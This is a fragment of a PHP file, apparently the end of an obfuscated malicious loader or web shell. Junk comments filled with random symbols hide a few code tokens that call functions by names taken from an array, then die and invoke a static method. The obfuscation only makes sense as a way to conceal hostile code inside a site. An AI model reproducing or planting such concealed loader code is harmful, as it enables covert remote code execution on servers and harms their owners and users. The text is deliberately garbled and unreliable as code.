. /*-Q}r-*///
$QyFmBYcPj/*-fX)p9URK-*///
[/*-Bz+-*///
3+1/*-

ⓠ〖～▵❼┗⑷⋽⇆ⅿ┯▃╟㊆◈▮▥↱

tP%NIⓠ〖～▵❼┗⑷⋽⇆ⅿ┯▃╟㊆◈▮▥↱

-*///
]/*-;5chvhE<-*///
(/*-

⊄﹜⌓▰﹛⇊↞➮⊸︾﹢ⓩ⇣

ef].TWCE⊄﹜⌓▰﹛⇊↞➮⊸︾﹢ⓩ⇣

-*///
$LcYQliP/*-,,-*///
)/*-
Ⅾ⒁✂➫▤♖≏⓴◕➾┨∓⒉ˉⓀ‰③⇄
;,Ⅾ⒁✂➫▤♖≏⓴◕➾┨∓⒉ˉⓀ‰③⇄
-*///
 . /*-

➒⑳⇁┐}⑰♀✪↉±ℐ

)0250Y::➒⑳⇁┐}⑰♀✪↉±ℐ

-*///
$QyFmBYcPj/*-


✻◛


3lV!:_✻◛


-*///
[/*-dHDJ{z-*///
3+5/*-^`k?Ih~p-*///
]/*-
⋪✡⒰⒓⌘≿▥╃
J=vr6PmL⋪✡⒰⒓⌘≿▥╃
-*///
);/*-^P!-*///
/*-

┻㈠❇Ↄ╇╖⋉Ⓩ⋷

)2F9>B=7J┻㈠❇Ↄ╇╖⋉Ⓩ⋷

-*///
die;/*-ci-*///
 endif;/*-zu1lJ-*///
 }/*-@f-*///
}/*-
ⅺ∷⋃―✢〃╦
ioⅺ∷⋃―✢〃╦
-*///
i/*-P1t(w1I5=-*///
::/*-6N8-*///
zVvId/*-


➓﹎⇑⒘⌓§⒣➛⑿▦☹⊈⊖⊘☄♤ℌ㊍≭⋶≂


wDRy-2i➓﹎⇑⒘⌓§⒣➛⑿▦☹⊈⊖⊘☄♤ℌ㊍≭⋶≂


-*///
();/*-^E:tF>D+f-*///
 ?>